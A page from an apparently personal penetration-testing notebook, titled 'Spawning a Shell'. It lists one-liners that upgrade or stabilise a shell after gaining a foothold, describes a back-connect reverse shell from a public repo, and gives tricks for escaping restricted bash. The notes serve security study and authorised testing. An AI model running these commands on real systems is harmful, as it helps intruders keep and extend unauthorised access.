Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page

Was this helpful?

Spawning a Shell

Spawn a shell

The following commands can be used to spawn a shell once you have a foot inside.

python -c 'import pty; pty.spawn("/bin/sh")' 
python3 -c 'import pty; pty.spawn("/bin/sh")'

script -qc /bin/bash /dev/null

echo os.system('/bin/bash') 
/bin/sh -i 
perl -e 'exec "/bin/sh";' 
perl: exec "/bin/sh"; 
ruby: exec "/bin/sh" 
lua: os.execute('/bin/sh') 
exec "/bin/sh"; 
/bin/bash -i
exec "/bin/sh"                # (From within IRB) 
:!bash                        # (From within vi)
:set shell=/bin/bash:shell    # (From within vi) 
!sh                           # (From within nmap) 

Method:

=================== On Kali ===================
CTRL+z                <--- place the netcat connection to background 
stty raw -echo        <--- on your terminal 
fg                    <--- bring back the terminal
stty -a               <--- make a note of rows, columns

=================== On Target ===================
export SHELL=bash 
export TERM=xterm256-color  OR  export TERM=xterm
stty rows 38             <--- from notes above.
stty columns 116         <--- from notes above.

Python PTY Shells

Clone the repo https://github.com/infodox/python-pty-shells.git

On kali:
1) Make changes to reflect your IP and PORT on tcp_pty_backconnect.py file
2) Pass this file to the target. 
3) python tcp_pty_shell_handler.py -b IP:PORT

On target:
1) python tcp_pty_backconnect.py

Escaping RBASH (Restricted Bash)

##############################################

ssh username@<IP-Adress> -t "bash --noprofile"

##############################################

vi
:set shell=/bin/bash
:shell

##############################################

cd /home
echo $SHELL
ed
!'/bin/bash'
pwd

##############################################

awk 'BEGIN {system("/bin/bash")}'
cd /home
cd ~
pwd

##############################################

perl -e 'system("/bin/bash");'
PreviousSLmail B.ONextPassword Attacks

Last updated 3 years ago

Was this helpful?